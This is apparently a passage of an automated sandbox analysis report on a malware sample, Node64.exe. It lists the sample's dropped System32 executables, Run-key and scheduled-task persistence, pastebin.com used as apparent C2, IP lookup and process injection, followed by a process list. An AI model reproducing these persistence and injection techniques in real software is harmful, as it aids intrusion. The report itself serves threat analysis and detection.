| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\$Node32.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node2Json.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node3Json.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File created | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File created | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1300 set thread context of 324 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\System32\$Node32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2C5C930-ED4B-4A58-B011-C97B23288330}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DE3EC6A" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DE3EC6A" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f568195fd89c2d45ba66f134061263750000000002000000000010660000000100002000000022d465a17fc2e82f2fd8ae421ebad4037396ebdfcfd8dd9acef6db86bffe820c000000000e800000000200002000000058bb1295083f924879b43722f305d729a2db8740fed5f8b82dbc5bd4cbf3f612b0030000436836fc0b8f1fe3a53c9c92287cc8ef0b410e69049375af493efd17a413771f0af75056bf8a33ab32d5809b4cb3005a49ea779f2150bf599d8e745ebf3a2d60bbf1158cd9b6c6982468ce7349d208f73cb60a7d5cdd1520197209aed1bda07963afce3cb43b47fafd50a4076e27886c1e2913067e85ae2514028dec95f0c7e4aa895f0de028a834c4e605f1ecfb73711050ec2ce83fcd0a7715d594ec7970d88a10b147f82648785cec8a1cdb9852bd319d5dbf8504dccd165c1be0a852c38a65fa749695e6f7ee10e534ddf256f6173e4b9cc41f089cbbe9d1496c5f03244938474f635ee13fd9151a6caef0728e6931ef5a9836254c78edf5f54b1c8b9faa5e8a452050437eaa5433ce113de64be95c62d40a983768e3c5fe9e6726f047cffdc15e24afdd632ffe85807f0844cebb6e8a619ef1329d30b7fe3586a2f8b8b3bec2a0057302b49fdb9bea3f5bf9b51da29f1e084a83be85b9fe252b035832884f81d82524b3d3c3834b4a38c4f5b783d589f132bf7f9ab284045275903c97e991950ebf3835478f2cc643255efa6ed5a7f440da1fc6cffb3d2af467f2c6d97a1d847ace77a7bb54b4c062fc99ec113dd84929cd30d33627cd6dd7379cd8834fbfe1c33cc53386278bc48a74aec354fa54f424e680799ff98a031c9bd3bd9149c7c57aa28d9f21e533f7c660f9655d331ea93f345219e098fa01e31202b66b177489baba10d9c08325224842e2785ed09cd787f20be60b6b1e63af405ae8603300ff9039fea02f918d6069476206d810eaf4ff4c34e3c8eaea14f8bdec0aee4f8c1d566dbfee23183084bce8dcc207ed85c4bf1a864de8d1aa2442538098ba0549cbbdc91ac95f7ba1b8ccaf62f73e3c4a6965cd8e747ea1d37578bc45401d10ad0086911ab7436f6f16099f52afb3049cb5494ce4422280cb00084c5b2ed66e6050cdd6825a921f5993345eda6565878525a946da4f2921565f689d3ea1ab9911a686a162b4f953806fa7ee96dd35cc83ce86334110c956c0d4d4d03b1fdc85ffcb82f2504cf3cd7a44e290f7f9544425033f5a368735b08dcea3fd917d7c0ff14c5f5c8de436f0f15582a30e8d768d189d861bd30e18d580b1a7b2563801cc112072264f48ffb2ef03b30388b0cd17abc885e9dad26e29ace8ac379b67c724fab6e664c4097fd8e2c36235ba73ce56d2f23a98eb43deb65b9b30369f4722627a9478b37fe4ce982bae804d17fdd397149368b040195d9463e1e150962ddcc19a23095888a3aaa119c459d73edac9b4a2152317eabf96982d74aef0f601a02a97763e04d8d93364573e24f66a0bc33240000000f80e10c1d8ba925cb1d640d90623e36c858ac8a1eb5a9c14e6e3ccf39f5010b98dca39267b903408ffa164e95645de8fa4f637e8777d1df029f1aa34c1a0bbe6 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"
C:\Windows\System32\WaaSMedicAgent.exe
